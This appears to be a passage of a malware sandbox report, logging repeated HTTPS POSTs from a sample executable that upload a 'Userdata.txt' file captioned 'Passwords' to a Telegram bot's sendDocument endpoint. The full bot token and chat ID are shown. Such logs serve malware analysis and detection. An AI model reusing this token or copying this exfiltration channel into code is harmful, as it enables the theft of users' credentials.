                                                                                                                2025-01-10 21:44:41 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43660,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545481,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                43192.168.2.650070149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:43 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd35896607e1dd
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:44:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 38 39 36 36 30 37 65 31 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd35896607e1ddContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:43 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:43 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:43 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43661,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545483,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                44192.168.2.650072149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:44 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd35c03d1e8178
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 63 30 33 64 31 65 38 31 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd35c03d1e8178Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:45 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:45 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:45 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43662,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545485,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                45192.168.2.650074149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:46 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd360fa29ea145
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:44:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 30 66 61 32 39 65 61 31 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd360fa29ea145Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:46 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:46 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:46 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43663,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545486,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                46192.168.2.650076149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:48 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd364c895051e4
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:44:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 34 63 38 39 35 30 35 31 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd364c895051e4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:48 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:48 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:48 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43664,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545488,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                47192.168.2.650078149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:49 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd36894d4ea567
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:44:49 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 38 39 34 64 34 65 61 35 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd36894d4ea567Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:50 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:49 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:50 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43665,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545489,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                48192.168.2.650080149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:51 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd36c493ff07a4
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 63 34 39 33 66 66 30 37 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd36c493ff07a4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:51 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:51 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 546
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:51 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43666,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545491,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                49192.168.2.650082149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:52 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd370e456300b2
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:44:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 30 65 34 35 36 33 30 30 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd370e456300b2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:53 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:53 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
